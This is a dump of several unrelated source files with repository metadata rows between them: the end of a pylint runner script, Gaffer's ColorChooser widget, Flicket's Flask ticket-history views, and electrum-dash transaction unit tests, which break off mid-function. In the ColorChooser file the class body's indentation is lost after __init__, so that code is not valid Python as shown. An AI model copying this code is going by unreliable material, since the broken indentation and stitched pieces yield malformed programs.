    """ Collect every .py file referenced by 'paths_to_lint'. """
    collected = []
    for (path, recursive) in paths_to_lint:
        if path.is_file():
            # Hard-coded file entries must already be Python files.
            if path.suffix.lower() != ".py":
                print(path, "does note have extension '.py'")
                sys.exit(-1)
            collected.append(path)
        elif path.is_dir():
            # Directories are searched, recursively when requested.
            pattern = "**/*.py" if recursive else "*.py"
            collected.extend(path.glob(pattern))
        elif not path.exists():
            error("Non-existant path:", path)
        else:
            error("Unhandled path:", path)
    return collected
def main():
    """
    Run pylint on all Python files found via 'paths_to_lint' and print a
    per-file pass/fail summary. Exits with the number of failing files.
    """
    parser = argparse.ArgumentParser()
    parser.add_argument(
        "--check_grandfathered",
        action="store_true",
        help="Also check grandfathered files for lint errors.",
    )
    args = parser.parse_args()

    # Expand all paths
    paths = expand_paths()
    print(TermColor.BLUE + "Linting", len(paths), "python files.", TermColor.END)

    # Lint files
    num_error_files = 0
    for path in paths:
        relpath_str = str(path.relative_to(repo_path))
        if (path in grandfathered_files) and not args.check_grandfathered:
            print(
                TermColor.YELLOW + relpath_str, "skipped (grandfathered)", TermColor.END,
            )
            continue

        # Pylint checks to ignore
        ignore_list = []

        # Ignore function argument indenting, which is currently
        # incompatible with black: https://github.com/psf/black/issues/48
        ignore_list.append("C0330")

        # Build pylint command. ignore_list is the single source of
        # truth for disabled checks; the previous version also
        # hard-coded "--disable=C0330" here, passing the flag twice.
        cmd = ["pylint", path, "-s", "n"]
        if ignore_list:
            cmd.append("--disable=" + ",".join(ignore_list))

        # Run pylint and check output
        process = subprocess.run(cmd, check=False, stdout=subprocess.PIPE)
        if process.returncode:
            print(TermColor.RED + relpath_str, "has lint errors", TermColor.END)
            print(process.stdout.decode().strip())
            num_error_files += 1
        else:
            print(TermColor.GREEN + relpath_str, "passed", TermColor.END)

    if num_error_files:
        error(num_error_files, "file(s) failed lint test.", returncode=num_error_files)
    else:
        print(TermColor.GREEN + "Lint passed.", TermColor.END)
# Script entry point.
if __name__ == "__main__":
    main()
| 37.03 | 89 | 0.625844 |
9ce92af3e911484e4dbd57cc3e1b14537daec916 | 9,906 | py | Python | python/GafferUI/ColorChooser.py | ddesmond/gaffer | 4f25df88103b7893df75865ea919fb035f92bac0 | [
"BSD-3-Clause"
] | 561 | 2016-10-18T04:30:48.000Z | 2022-03-30T06:52:04.000Z | python/GafferUI/ColorChooser.py | ddesmond/gaffer | 4f25df88103b7893df75865ea919fb035f92bac0 | [
"BSD-3-Clause"
] | 1,828 | 2016-10-14T19:01:46.000Z | 2022-03-30T16:07:19.000Z | python/GafferUI/ColorChooser.py | ddesmond/gaffer | 4f25df88103b7893df75865ea919fb035f92bac0 | [
"BSD-3-Clause"
] | 120 | 2016-10-18T15:19:13.000Z | 2021-12-20T16:28:23.000Z | ##########################################################################
#
# Copyright (c) 2011-2012, John Haddon. All rights reserved.
# Copyright (c) 2011-2013, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with
# the distribution.
#
# * Neither the name of John Haddon nor the names of
# any other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
import sys
import imath
import IECore
import Gaffer
import GafferUI
from Qt import QtGui
# A custom slider for drawing the backgrounds.
class _ComponentSlider( GafferUI.Slider ) :
	"""A slider for a single colour component (r/g/b/a or h/s/v) which
	paints a gradient background showing the effect of varying that
	component while the others stay fixed."""

	def __init__( self, color, component, useDisplayTransform = True, **kw ) :

		# Soft limits are always [0,1]; r/g/b/v additionally allow
		# arbitrarily large hard values (HDR colours).
		min = hardMin = 0
		max = hardMax = 1
		if component in ( "r", "g", "b", "v" ) :
			hardMax = sys.float_info.max
		GafferUI.Slider.__init__( self, 0.0, min, max, hardMin, hardMax, **kw )
		self.color = color
		self.component = component
		self.__useDisplayTransform = useDisplayTransform
		# Repaint the gradient whenever the global display transform changes.
		if self.__useDisplayTransform :
			GafferUI.DisplayTransform.changedSignal().connect( Gaffer.WeakMethod( self.__displayTransformChanged ), scoped = False )

	def setColor( self, color ) :

		self.color = color
		self._qtWidget().update()

	def getColor( self ) :

		return self.color

	def _drawBackground( self, painter ) :

		size = self.size()
		grad = QtGui.QLinearGradient( 0, 0, size.x, 0 )
		displayTransform = GafferUI.DisplayTransform.get() if self.__useDisplayTransform else lambda x : x
		if self.component == "a" :
			# Alpha is drawn as a plain black-to-white ramp.
			c1 = imath.Color3f( 0 )
			c2 = imath.Color3f( 1 )
		else :
			# Sweep only this slider's component from 0 to 1, holding the
			# other components at their current values (in HSV space for
			# the h/s/v sliders).
			c1 = imath.Color3f( self.color[0], self.color[1], self.color[2] )
			c2 = imath.Color3f( self.color[0], self.color[1], self.color[2] )
			if self.component in "hsv" :
				c1 = c1.rgb2hsv()
				c2 = c2.rgb2hsv()
			a = { "r" : 0, "g" : 1, "b" : 2, "h" : 0, "s" : 1, "v": 2 }[self.component]
			c1[a] = 0
			c2[a] = 1
		# One gradient stop per two pixels is enough to look smooth.
		numStops = max( 2, size.x // 2 )
		for i in range( 0, numStops ) :
			t = float( i ) / (numStops-1)
			c = c1 + (c2-c1) * t
			if self.component in "hsv" :
				c = c.hsv2rgb()
			grad.setColorAt( t, self._qtColor( displayTransform( c ) ) )
		brush = QtGui.QBrush( grad )
		painter.fillRect( 0, 0, size.x, size.y, brush )

	def __displayTransformChanged( self ) :

		self._qtWidget().update()
class ColorChooser( GafferUI.Widget ) :
ColorChangedReason = IECore.Enum.create( "Invalid", "SetColor", "Reset" )
	def __init__( self, color=imath.Color3f( 1 ), useDisplayTransform = True, **kw ) :

		self.__column = GafferUI.ListContainer( GafferUI.ListContainer.Orientation.Vertical, spacing = 4 )
		GafferUI.Widget.__init__( self, self.__column, **kw )
		self.__color = color
		self.__defaultColor = color
		self.__sliders = {}
		self.__numericWidgets = {}
		self.__componentValueChangedConnections = []
		with self.__column :
			# One row per component: a numeric entry field paired with a
			# gradient slider, both hooked up to __componentValueChanged.
			for component in "rgbahsv" :
				with GafferUI.ListContainer( GafferUI.ListContainer.Orientation.Horizontal, spacing = 4 ) :
					numericWidget = GafferUI.NumericWidget( 0.0 )
					numericWidget.setFixedCharacterWidth( 6 )
					numericWidget.component = component
					self.__numericWidgets[component] = numericWidget
					slider = _ComponentSlider( color, component, useDisplayTransform = useDisplayTransform )
					self.__sliders[component] = slider
					self.__componentValueChangedConnections.append(
						numericWidget.valueChangedSignal().connect( Gaffer.WeakMethod( self.__componentValueChanged ), scoped = False )
					)
					self.__componentValueChangedConnections.append(
						slider.valueChangedSignal().connect( Gaffer.WeakMethod( self.__componentValueChanged ), scoped = False )
					)
			# initial and current colour swatches
			with GafferUI.ListContainer( GafferUI.ListContainer.Orientation.Horizontal, parenting = { "expand" : True } ) :
				self.__initialColorSwatch = GafferUI.ColorSwatch( color, useDisplayTransform = useDisplayTransform, parenting = { "expand" : True } )
				self.__initialColorSwatch.buttonPressSignal().connect( Gaffer.WeakMethod( self.__initialColorPress ), scoped = False )
				GafferUI.Spacer( imath.V2i( 4, 40 ) )
				self.__colorSwatch = GafferUI.ColorSwatch( color, useDisplayTransform = useDisplayTransform, parenting = { "expand" : True } )
		self.__colorChangedSignal = Gaffer.Signal2()
		self.__updateUIFromColor()
	## The default color starts as the value passed when creating the dialogue.
	# It is represented with a swatch which when clicked will revert the current
	# selection back to the original.
	def setInitialColor( self, color ) :

		# The initial colour is stored on the swatch itself; clicking the
		# swatch restores it via __initialColorPress.
		self.__initialColorSwatch.setColor( color )
def getInitialColor( self ) :

	# The swatch itself is the authoritative store for the initial colour.
	initial = self.__initialColorSwatch.getColor()
	return initial
def setColor( self, color ) :

	# Programmatic changes are reported with the SetColor reason.
	reason = self.ColorChangedReason.SetColor
	self.__setColorInternal( color, reason )
def getColor( self ) :

	# Returns the internally cached colour (always stored in RGB space;
	# hsv edits are converted back in __componentValueChanged()).
	return self.__color
## A signal emitted whenever the color is changed. Slots should
# have the signature slot( ColorChooser, reason ). The reason
# argument may be passed either a ColorChooser.ColorChangedReason,
# a Slider.ValueChangedReason or a NumericWidget.ValueChangedReason
# to describe the reason for the change.
def colorChangedSignal( self ) :

	return self.__colorChangedSignal
## Returns True if a user would expect the specified sequence
# of changes to be merged into a single undoable event.
@classmethod
def changesShouldBeMerged( cls, firstReason, secondReason ) :

	# Delegate to whichever widget class the first reason came from;
	# reasons from unknown sources are never merged.
	for widgetClass in ( GafferUI.Slider, GafferUI.NumericWidget ) :
		if isinstance( firstReason, widgetClass.ValueChangedReason ) :
			return widgetClass.changesShouldBeMerged( firstReason, secondReason )

	return False
def __initialColorPress( self, button, event ) :

	# Clicking the initial colour swatch reverts the selection back to
	# the initial colour; the button/event arguments are unused.
	self.__setColorInternal( self.getInitialColor(), self.ColorChangedReason.Reset )
def __componentValueChanged( self, componentWidget, reason ) :
	# Called when any slider or numeric field changes. Rebuilds the colour
	# from the edited component and pushes it through __setColorInternal()
	# with the originating widget's reason.

	## \todo We're doing the clamping here because NumericWidget
	# doesn't provide the capability itself. Add the functionality
	# into the NumericWidget and remove this code.
	componentValue = componentWidget.getValue()
	componentValue = max( componentValue, 0 )
	if componentWidget.component in ( "a", "h", "s" ) :
		componentValue = min( componentValue, 1 )

	# copy so we never mutate self.__color in place
	newColor = self.__color.__class__( self.__color )
	if componentWidget.component in ( "r", "g", "b", "a" ) :
		a = { "r" : 0, "g" : 1, "b" : 2, "a" : 3 }[componentWidget.component]
		newColor[a] = componentValue
	else :
		# hue/saturation/value edits : convert to hsv, tweak, convert back
		newColor = newColor.rgb2hsv()
		a = { "h" : 0, "s" : 1, "v" : 2 }[componentWidget.component]
		newColor[a] = componentValue
		newColor = newColor.hsv2rgb()

	self.__setColorInternal( newColor, reason )
def __setColorInternal( self, color, reason ) :
	# Central point through which every colour change flows. Updates the
	# cached colour and the current swatch, and emits colorChangedSignal().

	dragBeginOrEnd = reason in (
		GafferUI.Slider.ValueChangedReason.DragBegin,
		GafferUI.Slider.ValueChangedReason.DragEnd,
		GafferUI.NumericWidget.ValueChangedReason.DragBegin,
		GafferUI.NumericWidget.ValueChangedReason.DragEnd,
	)
	if color != self.__color or dragBeginOrEnd :
		# we never optimise away drag begin or end, because it's important
		# that they emit in pairs.
		self.__color = color
		self.__colorSwatch.setColor( color )
		self.__colorChangedSignal( self, reason )

	## \todo This is outside the conditional because the clamping we do
	# in __componentValueChanged means the color value may not correspond
	# to the value in the ui, even if it hasn't actually changed. Move this
	# back inside the conditional when we get the clamping performed internally
	# in NumericWidget.
	self.__updateUIFromColor()
def __updateUIFromColor( self ) :
	# Pushes self.__color into all sliders, numeric fields and swatches.
	# Connections are blocked so that setting the widgets does not feed
	# back into __componentValueChanged().

	with Gaffer.BlockedConnection( self.__componentValueChangedConnections ) :

		c = self.getColor()

		for slider in self.__sliders.values() :
			slider.setColor( c )

		for component, index in ( ( "r", 0 ), ( "g", 1 ), ( "b", 2 ) ) :
			self.__sliders[component].setValue( c[index] )
			self.__numericWidgets[component].setValue( c[index] )

		# the alpha row is only shown for 4-component colours
		if c.dimensions() == 4 :
			self.__sliders["a"].setValue( c[3] )
			self.__numericWidgets["a"].setValue( c[3] )
			self.__sliders["a"].parent().setVisible( True )
		else :
			self.__sliders["a"].parent().setVisible( False )

		# derive the hsv rows from the rgb colour
		c = c.rgb2hsv()
		for component, index in ( ( "h", 0 ), ( "s", 1 ), ( "v", 2 ) ) :
			self.__sliders[component].setValue( c[index] )
			self.__numericWidgets[component].setValue( c[index] )
| 35.505376 | 137 | 0.705734 |
81ceda09dda34bb61429a658769b1c0f4859dc73 | 1,475 | py | Python | application/flicket/views/history.py | juangom/flicket | 56be865bbd715655da4eb4107294effc8a76709c | [
"MIT"
] | null | null | null | application/flicket/views/history.py | juangom/flicket | 56be865bbd715655da4eb4107294effc8a76709c | [
"MIT"
] | null | null | null | application/flicket/views/history.py | juangom/flicket | 56be865bbd715655da4eb4107294effc8a76709c | [
"MIT"
] | null | null | null | #! usr/bin/python3
# -*- coding: utf-8 -*-
#
# Flicket - copyright Paul Bourne: evereux@gmail.com
from flask import render_template, url_for
from flask_babel import gettext
from flask_login import login_required
from application import app, flicket_bp
from application.flicket.models.flicket_models import FlicketHistory, FlicketPost, FlicketTicket
from application.flicket.scripts.flicket_user_details import FlicketUserDetails
@flicket_bp.route(app.config['FLICKET'] + 'history/topic/<int:topic_id>/', methods=['GET', 'POST'])
@login_required
def flicket_history_topic(topic_id):
    """Render the change history for a ticket (topic)."""
    ticket = FlicketTicket.query.filter_by(id=topic_id).one()
    history = FlicketHistory.query.filter_by(topic_id=topic_id).all()

    return render_template(
        'flicket_history.html',
        title=gettext('Flicket - History'),
        history=history,
        ticket=ticket)
@flicket_bp.route(app.config['FLICKET'] + 'history/post/<int:post_id>/', methods=['GET', 'POST'])
@login_required
def flicket_history_post(post_id):
    """Render the change history for a single post.

    The post's parent ticket is also looked up so the template can
    generate a link back to the topic.
    """
    post = FlicketPost.query.filter_by(id=post_id).one()
    ticket = FlicketTicket.query.filter_by(id=post.ticket_id).one()
    history = FlicketHistory.query.filter_by(post_id=post_id).all()

    return render_template(
        'flicket_history.html',
        title=gettext('History'),
        history=history,
        ticket=ticket)
| 30.729167 | 99 | 0.729492 |
f56b4d03abea2e4d94f6e59ce54b4a3de5fa58ca | 14,090 | py | Python | lib/tests/test_transaction.py | ray-learn/electrum-dash | 3d2b605cc358592b6e7039481104a7a50c51d4e8 | [
"MIT"
] | null | null | null | lib/tests/test_transaction.py | ray-learn/electrum-dash | 3d2b605cc358592b6e7039481104a7a50c51d4e8 | [
"MIT"
] | null | null | null | lib/tests/test_transaction.py | ray-learn/electrum-dash | 3d2b605cc358592b6e7039481104a7a50c51d4e8 | [
"MIT"
] | null | null | null | import unittest
from lib import transaction
from lib.bitcoin import TYPE_ADDRESS
from lib.keystore import xpubkey_to_address
from lib.util import bh2u, bfh
# Raw transaction hex fixtures used by the tests below.
# A 1-input / 1-output transaction before signing (the scriptSig still
# holds the extended-pubkey placeholder).
unsigned_blob = '01000000012a5c9a94fcde98f5581cd00162c60a13936ceb75389ea65bf38633b424eb4031000000005701ff4c53ff0488b21e03ef2afea18000000089689bff23e1e7fb2f161daa37270a97a3d8c2e537584b2d304ecb47b86d21fc021b010d3bd425f8cf2e04824bfdf1f1f5ff1d51fadd9a41f9e3fb8dd3403b1bfe00000000ffffffff0140420f00000000001976a914230ac37834073a42146f11ef8414ae929feaafc388ac00000000'
# The same transaction once signed (scriptSig contains signature + pubkey).
signed_blob = '01000000012a5c9a94fcde98f5581cd00162c60a13936ceb75389ea65bf38633b424eb4031000000006c493046022100a82bbc57a0136751e5433f41cf000b3f1a99c6744775e76ec764fb78c54ee100022100f9e80b7de89de861dc6fb0c1429d5da72c2b6b2ee2406bc9bfb1beedd729d985012102e61d176da16edd1d258a200ad9759ef63adf8e14cd97f53227bae35cdb84d2f6ffffffff0140420f00000000001976a914230ac37834073a42146f11ef8414ae929feaafc388ac00000000'
# A version-2 transaction, used to check parsing of the version field.
v2_blob = "0200000001191601a44a81e061502b7bfbc6eaa1cef6d1e6af5308ef96c9342f71dbf4b9b5000000006b483045022100a6d44d0a651790a477e75334adfb8aae94d6612d01187b2c02526e340a7fd6c8022028bdf7a64a54906b13b145cd5dab21a26bd4b85d6044e9b97bceab5be44c2a9201210253e8e0254b0c95776786e40984c1aa32a7d03efa6bdacdea5f421b774917d346feffffff026b20fa04000000001976a914024db2e87dd7cfd0e5f266c5f212e21a31d805a588aca0860100000000001976a91421919b94ae5cefcdf0271191459157cdb41c4cbf88aca6240700"
class TestBCDataStream(unittest.TestCase):

    """Unit tests for the BCDataStream serialisation helper."""

    def test_compact_size(self):
        stream = transaction.BCDataStream()
        samples = [0, 1, 252, 253, 2**16-1, 2**16, 2**32-1, 2**32, 2**64-1]
        for value in samples:
            stream.write_compact_size(value)
        # negative sizes must be rejected
        with self.assertRaises(transaction.SerializationError):
            stream.write_compact_size(-1)
        self.assertEqual(
            bh2u(stream.input),
            '0001fcfdfd00fdfffffe00000100feffffffffff0000000001000000ffffffffffffffffff')

        # everything written must read back unchanged, in order
        for value in samples:
            self.assertEqual(stream.read_compact_size(), value)
        # the stream is now exhausted
        with self.assertRaises(transaction.SerializationError):
            stream.read_compact_size()

    def test_string(self):
        stream = transaction.BCDataStream()
        # reading from an empty stream fails
        with self.assertRaises(transaction.SerializationError):
            stream.read_string()

        messages = ['Hello', ' ', 'World', '', '!']
        for message in messages:
            stream.write_string(message)
        for message in messages:
            self.assertEqual(stream.read_string(), message)
        with self.assertRaises(transaction.SerializationError):
            stream.read_string()

    def test_bytes(self):
        stream = transaction.BCDataStream()
        stream.write(b'foobar')
        # reads consume the buffer; over-long reads return what is left
        self.assertEqual(stream.read_bytes(3), b'foo')
        self.assertEqual(stream.read_bytes(2), b'ba')
        self.assertEqual(stream.read_bytes(4), b'r')
        self.assertEqual(stream.read_bytes(1), b'')
class TestTransaction(unittest.TestCase):

    """Tests for parsing, serialising and hashing transactions."""

    def test_tx_unsigned(self):
        # expected deserialisation of the module-level ``unsigned_blob``
        expected = {
            'inputs': [{
                'type': 'p2pkh',
                'address': 'XdjwdihsyoLpoCHFUpd8x3iH1rsMsS2q5P',
                'num_sig': 1,
                'prevout_hash': '3140eb24b43386f35ba69e3875eb6c93130ac66201d01c58f598defc949a5c2a',
                'prevout_n': 0,
                'pubkeys': ['02e61d176da16edd1d258a200ad9759ef63adf8e14cd97f53227bae35cdb84d2f6'],
                'scriptSig': '01ff4c53ff0488b21e03ef2afea18000000089689bff23e1e7fb2f161daa37270a97a3d8c2e537584b2d304ecb47b86d21fc021b010d3bd425f8cf2e04824bfdf1f1f5ff1d51fadd9a41f9e3fb8dd3403b1bfe00000000',
                'sequence': 4294967295,
                'signatures': [None],
                'x_pubkeys': ['ff0488b21e03ef2afea18000000089689bff23e1e7fb2f161daa37270a97a3d8c2e537584b2d304ecb47b86d21fc021b010d3bd425f8cf2e04824bfdf1f1f5ff1d51fadd9a41f9e3fb8dd3403b1bfe00000000']}],
            'lockTime': 0,
            'outputs': [{
                'address': 'Xdt8NqE5wSX9ytfP958t4tKdXoZDo6Bm6T',
                'prevout_n': 0,
                'scriptPubKey': '76a914230ac37834073a42146f11ef8414ae929feaafc388ac',
                'type': TYPE_ADDRESS,
                'value': 1000000}],
            'version': 1
        }
        tx = transaction.Transaction(unsigned_blob)
        self.assertEqual(tx.deserialize(), expected)
        # deserialize() is one-shot : a second call returns None
        self.assertEqual(tx.deserialize(), None)
        self.assertEqual(tx.as_dict(), {'hex': unsigned_blob, 'complete': False, 'final': True})
        self.assertEqual(tx.get_outputs(), [('Xdt8NqE5wSX9ytfP958t4tKdXoZDo6Bm6T', 1000000)])
        self.assertEqual(tx.get_output_addresses(), ['Xdt8NqE5wSX9ytfP958t4tKdXoZDo6Bm6T'])
        self.assertTrue(tx.has_address('Xdt8NqE5wSX9ytfP958t4tKdXoZDo6Bm6T'))
        self.assertTrue(tx.has_address('XdjwdihsyoLpoCHFUpd8x3iH1rsMsS2q5P'))
        self.assertFalse(tx.has_address('Xn6ZqLcuKpYoSkiXKmLMWKtoF2sNExHwjT'))
        self.assertEqual(tx.serialize(), unsigned_blob)

        # signing and then re-loading the unsigned blob round-trips
        tx.update_signatures(signed_blob)
        self.assertEqual(tx.raw, signed_blob)
        tx.update(unsigned_blob)
        tx.raw = None
        blob = str(tx)
        self.assertEqual(transaction.deserialize(blob), expected)

    def test_tx_signed(self):
        # expected deserialisation of the module-level ``signed_blob``
        expected = {
            'inputs': [{
                'type': 'p2pkh',
                'address': 'XdjwdihsyoLpoCHFUpd8x3iH1rsMsS2q5P',
                'num_sig': 1,
                'prevout_hash': '3140eb24b43386f35ba69e3875eb6c93130ac66201d01c58f598defc949a5c2a',
                'prevout_n': 0,
                'pubkeys': ['02e61d176da16edd1d258a200ad9759ef63adf8e14cd97f53227bae35cdb84d2f6'],
                'scriptSig': '493046022100a82bbc57a0136751e5433f41cf000b3f1a99c6744775e76ec764fb78c54ee100022100f9e80b7de89de861dc6fb0c1429d5da72c2b6b2ee2406bc9bfb1beedd729d985012102e61d176da16edd1d258a200ad9759ef63adf8e14cd97f53227bae35cdb84d2f6',
                'sequence': 4294967295,
                'signatures': ['3046022100a82bbc57a0136751e5433f41cf000b3f1a99c6744775e76ec764fb78c54ee100022100f9e80b7de89de861dc6fb0c1429d5da72c2b6b2ee2406bc9bfb1beedd729d98501'],
                'x_pubkeys': ['02e61d176da16edd1d258a200ad9759ef63adf8e14cd97f53227bae35cdb84d2f6']}],
            'lockTime': 0,
            'outputs': [{
                'address': 'Xdt8NqE5wSX9ytfP958t4tKdXoZDo6Bm6T',
                'prevout_n': 0,
                'scriptPubKey': '76a914230ac37834073a42146f11ef8414ae929feaafc388ac',
                'type': TYPE_ADDRESS,
                'value': 1000000}],
            'version': 1
        }
        tx = transaction.Transaction(signed_blob)
        self.assertEqual(tx.deserialize(), expected)
        self.assertEqual(tx.deserialize(), None)
        self.assertEqual(tx.as_dict(), {'hex': signed_blob, 'complete': True, 'final': True})

        self.assertEqual(tx.serialize(), signed_blob)

        tx.update_signatures(signed_blob)

        # size estimates for a fully-signed 1-in/1-out p2pkh transaction
        self.assertEqual(tx.estimated_total_size(), 193)
        self.assertEqual(tx.estimated_base_size(), 193)
        self.assertEqual(tx.estimated_weight(), 772)
        self.assertEqual(tx.estimated_size(), 193)

    def test_estimated_output_size(self):
        estimated_output_size = transaction.Transaction.estimated_output_size
        self.assertEqual(estimated_output_size('Xdt8NqE5wSX9ytfP958t4tKdXoZDo6Bm6T'), 34)
        self.assertEqual(estimated_output_size('7WHUEVtMDLeereT5r4ZoNKjr3MXr4gqfon'), 32)

    def test_errors(self):
        # invalid inputs must raise, not fail silently
        with self.assertRaises(TypeError):
            transaction.Transaction.pay_script(output_type=None, addr='')

        with self.assertRaises(BaseException):
            xpubkey_to_address('')

    def test_parse_xpub(self):
        res = xpubkey_to_address('fe4e13b0f311a55b8a5db9a32e959da9f011b131019d4cebe6141b9e2c93edcbfc0954c358b062a9f94111548e50bde5847a3096b8b7872dcffadb0e9579b9017b01000200')
        self.assertEqual(res, ('04ee98d63800824486a1cf5b4376f2f574d86e0a3009a6448105703453f3368e8e1d8d090aaecdd626a45cc49876709a3bbb6dc96a4311b3cac03e225df5f63dfc', 'XjNytJHxbRZCF4s7MzaKvw4Rrf6bPRuPnW'))

    def test_version_field(self):
        tx = transaction.Transaction(v2_blob)
        self.assertEqual(tx.txid(), "b97f9180173ab141b61b9f944d841e60feec691d6daab4d4d932b24dd36606fe")

    def test_get_address_from_output_script(self):
        # the inverse of this test is in test_bitcoin: test_address_to_script
        addr_from_script = lambda script: transaction.get_address_from_output_script(bfh(script))
        ADDR = transaction.TYPE_ADDRESS

        # base58 p2pkh
        self.assertEqual((ADDR, 'XeNTG4aihv1ru8xmaoiQnToSi8hLiTTNbh'), addr_from_script('76a91428662c67561b95c79d2257d2a93d9d151c977e9188ac'))
        self.assertEqual((ADDR, 'XkvgWFLxVmDaVkUF8bFE2QXP4f5C2KKWEg'), addr_from_script('76a914704f4b81cadb7bf7e68c08cd3657220f680f863c88ac'))

        # base58 p2sh
        self.assertEqual((ADDR, '7WHUEVtMDLeereT5r4ZoNKjr3MXr4gqfon'), addr_from_script('a9142a84cf00d47f699ee7bbc1dea5ec1bdecb4ac15487'))
        self.assertEqual((ADDR, '7phNpVKta6kkbP24HfvvQVeHEmgBQYiJCB'), addr_from_script('a914f47c8954e421031ad04ecd8e7752c9479206b9d387'))

    #####

    def _run_naive_tests_on_tx(self, raw_tx, txid):
        # shared helper : parse, check txid, round-trip and size sanity
        tx = transaction.Transaction(raw_tx)
        self.assertEqual(txid, tx.txid())
        self.assertEqual(raw_tx, tx.serialize())
        self.assertTrue(tx.estimated_size() >= 0)

    def test_txid_coinbase_to_p2pk(self):
        raw_tx = '01000000010000000000000000000000000000000000000000000000000000000000000000ffffffff4103400d0302ef02062f503253482f522cfabe6d6dd90d39663d10f8fd25ec88338295d4c6ce1c90d4aeb368d8bdbadcc1da3b635801000000000000000474073e03ffffffff013c25cf2d01000000434104b0bd634234abbb1ba1e986e884185c61cf43e001f9137f23c2c409273eb16e6537a576782eba668a7ef8bd3b3cfb1edb7117ab65129b8a2e681f3c1e0908ef7bac00000000'
        txid = 'dbaf14e1c476e76ea05a8b71921a46d6b06f0a950f17c5f9f1a03b8fae467f10'
        self._run_naive_tests_on_tx(raw_tx, txid)

    def test_txid_coinbase_to_p2pkh(self):
        raw_tx = '01000000010000000000000000000000000000000000000000000000000000000000000000ffffffff25033ca0030400001256124d696e656420627920425443204775696c640800000d41000007daffffffff01c00d1298000000001976a91427a1f12771de5cc3b73941664b2537c15316be4388ac00000000'
        txid = '4328f9311c6defd9ae1bd7f4516b62acf64b361eb39dfcf09d9925c5fd5c61e8'
        self._run_naive_tests_on_tx(raw_tx, txid)

    def test_txid_p2pk_to_p2pkh(self):
        raw_tx = '010000000118231a31d2df84f884ced6af11dc24306319577d4d7c340124a7e2dd9c314077000000004847304402200b6c45891aed48937241907bc3e3868ee4c792819821fcde33311e5a3da4789a02205021b59692b652a01f5f009bd481acac2f647a7d9c076d71d85869763337882e01fdffffff016c95052a010000001976a9149c4891e7791da9e622532c97f43863768264faaf88ac00000000'
        txid = '90ba90a5b115106d26663fce6c6215b8699c5d4b2672dd30756115f3337dddf9'
        self._run_naive_tests_on_tx(raw_tx, txid)

    def test_txid_p2pk_to_p2sh(self):
        raw_tx = '0100000001e4643183d6497823576d17ac2439fb97eba24be8137f312e10fcc16483bb2d070000000048473044022032bbf0394dfe3b004075e3cbb3ea7071b9184547e27f8f73f967c4b3f6a21fa4022073edd5ae8b7b638f25872a7a308bb53a848baa9b9cc70af45fcf3c683d36a55301fdffffff011821814a0000000017a9143c640bc28a346749c09615b50211cb051faff00f8700000000'
        txid = '172bdf5a690b874385b98d7ab6f6af807356f03a26033c6a65ab79b4ac2085b5'
        self._run_naive_tests_on_tx(raw_tx, txid)

    def test_txid_p2pkh_to_p2pkh(self):
        raw_tx = '0100000001f9dd7d33f315617530dd72264b5d9c69b815626cce3f66266d1015b1a590ba90000000006a4730440220699bfee3d280a499daf4af5593e8750b54fef0557f3c9f717bfa909493a84f60022057718eec7985b7796bb8630bf6ea2e9bf2892ac21bd6ab8f741a008537139ffe012103b4289890b40590447b57f773b5843bf0400e9cead08be225fac587b3c2a8e973fdffffff01ec24052a010000001976a914ce9ff3d15ed5f3a3d94b583b12796d063879b11588ac00000000'
        txid = '24737c68f53d4b519939119ed83b2a8d44d716d7f3ca98bcecc0fbb92c2085ce'
        self._run_naive_tests_on_tx(raw_tx, txid)

    def test_txid_p2pkh_to_p2sh(self):
        raw_tx = '010000000195232c30f6611b9f2f82ec63f5b443b132219c425e1824584411f3d16a7a54bc000000006b4830450221009f39ac457dc8ff316e5cc03161c9eff6212d8694ccb88d801dbb32e85d8ed100022074230bb05e99b85a6a50d2b71e7bf04d80be3f1d014ea038f93943abd79421d101210317be0f7e5478e087453b9b5111bdad586038720f16ac9658fd16217ffd7e5785fdffffff0200e40b540200000017a914d81df3751b9e7dca920678cc19cac8d7ec9010b08718dfd63c2c0000001976a914303c42b63569ff5b390a2016ff44651cd84c7c8988acc7010000'
        txid = '155e4740fa59f374abb4e133b87247dccc3afc233cb97c2bf2b46bba3094aedc'
        self._run_naive_tests_on_tx(raw_tx, txid)

    # input: p2sh, not multisig
    def test_txid_regression_issue_3899(self):
        raw_tx = '0100000004328685b0352c981d3d451b471ae3bfc78b82565dc2a54049a81af273f0a9fd9c010000000b0009630330472d5fae685bffffffff328685b0352c981d3d451b471ae3bfc78b82565dc2a54049a81af273f0a9fd9c020000000b0009630359646d5fae6858ffffffff328685b0352c981d3d451b471ae3bfc78b82565dc2a54049a81af273f0a9fd9c030000000b000963034bd4715fae6854ffffffff328685b0352c981d3d451b471ae3bfc78b82565dc2a54049a81af273f0a9fd9c040000000b000963036de8705fae6860ffffffff0130750000000000001976a914b5abca61d20f9062fb1fdbb880d9d93bac36675188ac00000000'
        txid = 'f570d5d1e965ee61bcc7005f8fefb1d3abbed9d7ddbe035e2a68fa07e5fc4a0d'
        self._run_naive_tests_on_tx(raw_tx, txid)

    def test_txid_negative_version_num(self):
